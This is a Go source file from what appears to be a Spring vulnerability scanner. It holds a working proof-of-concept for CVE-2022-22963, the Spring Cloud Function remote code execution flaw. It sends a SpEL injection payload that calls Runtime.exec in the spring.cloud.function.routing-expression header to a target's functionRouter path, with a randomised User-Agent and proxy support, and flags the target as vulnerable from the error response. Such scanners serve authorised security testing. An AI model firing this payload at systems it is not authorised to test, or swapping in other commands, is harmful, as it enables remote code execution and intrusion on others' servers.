package poc

import (
	"github.com/fatih/color"
	"ssp/common"
	"strings"
)

func CVE_2022_22963(url, proxyURL string) {
	payload := `T(java.lang.Runtime).getRuntime().exec("whoami")`
	data := "test"

	header := map[string]string{
		"spring.cloud.function.routing-expression": payload,
		"Accept-Encoding":                          "gzip, deflate",
		"Accept":                                   "*/*",
		"Accept-Language":                          "en",
		"User-Agent":                               common.GetRandomUserAgent(),
		"Content-Type":                             "application/x-www-form-urlencoded",
	}
	path := "functionRouter"

	// Use the MakeRequest function with proxy
	_, body, err := common.MakeRequest(url+path, "POST", proxyURL, header, data)
	if err != nil {
		color.Yellow("[-] %s 请求失败，跳过漏洞检查\n", url)
		return
	}

	// Check for the presence of the error message to confirm vulnerability
	if strings.Contains(string(body), `"error":"Internal Server Error"`) {
		common.PrintVulnerabilityConfirmation("CVE-2022-22963", url, "存在漏洞，由于该漏洞无回显，请用Dnslog进行测试", "4")
		common.Vulnum++
	} else {
		color.Yellow("[-] %s 未发现CVE-2022-22963远程命令执行漏洞\n", url)
	}
}
